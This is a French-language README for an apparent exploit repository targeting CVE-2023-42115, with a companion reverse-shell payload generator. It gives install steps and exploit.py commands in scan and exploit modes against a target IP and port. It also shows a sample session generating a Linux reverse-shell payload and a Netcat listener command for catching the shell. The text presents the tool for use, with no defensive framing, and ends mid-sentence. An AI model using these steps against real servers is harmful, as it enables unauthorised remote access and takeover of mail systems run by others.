
Générateur de payloads d'exploit et de shell inversé basé sur Python pour CVE-2023-42115, proposant des modes de scan et d'exploitation ainsi que la création de payloads multiplateformes.
Ce dépôt contient deux scripts Python :
exploit.py : Un script pour exploiter la CVE-2023-42115.generate_payload.py : Un script pour générer des payloads de shell inversé (reverse shell).Avant d'exécuter les scripts, assurez-vous que Python 3 est installé sur votre système.
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
Installez les bibliothèques Python requises à l'aide de pip. Exécutez la commande suivante pour installer toutes les dépendances nécessaires listées dans requirements.txt :
pip install -r requirements.txt
exploit.py
Ce script exploite la vulnérabilité CVE-2023-42115.
python exploit.py -t <target_ip> -p <target_port> [options]
Options :
-t : L'adresse IP de la cible.
-p : Le port du service cible.
Exemple :
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
Ce script génère un payload de shell inversé (reverse shell) en fonction des entrées de l'utilisateur.
python generate_payload.py
Étapes :
Le script vous demandera les informations suivantes :
A. Type de payload (linux ou windows)
B. IP locale : adresse pour la connexion inversée
C. Port local : pour la connexion inversée ** I : Si vous êtes derrière un routeur ou si vous utilisez le NAT, assurez-vous de configurer correctement la redirection de port vers votre appareil exécutant Netcat.**
D. Nom du fichier de sortie (par exemple, payload.sh pour Linux ou payload.ps1 pour Windows)
Exemple :
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
Vous devez configurer un listener sur votre machine locale pour recevoir le shell inversé. Vous pouvez utiliser Netcat (nc) pour cela.
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
En suivant ces étapes, vous devriez pouvoir créer et utiliser un payload pour exploiter CVE-2023-42115 et recevoir une connexion de shell inversé.
Si vous avez des suggestions d'amélioration ou si vous souhaitez contribuer, veuillez ouvrir une issue ou soumettre une pull request.
Pour toute question ou assistance, veuillez contacter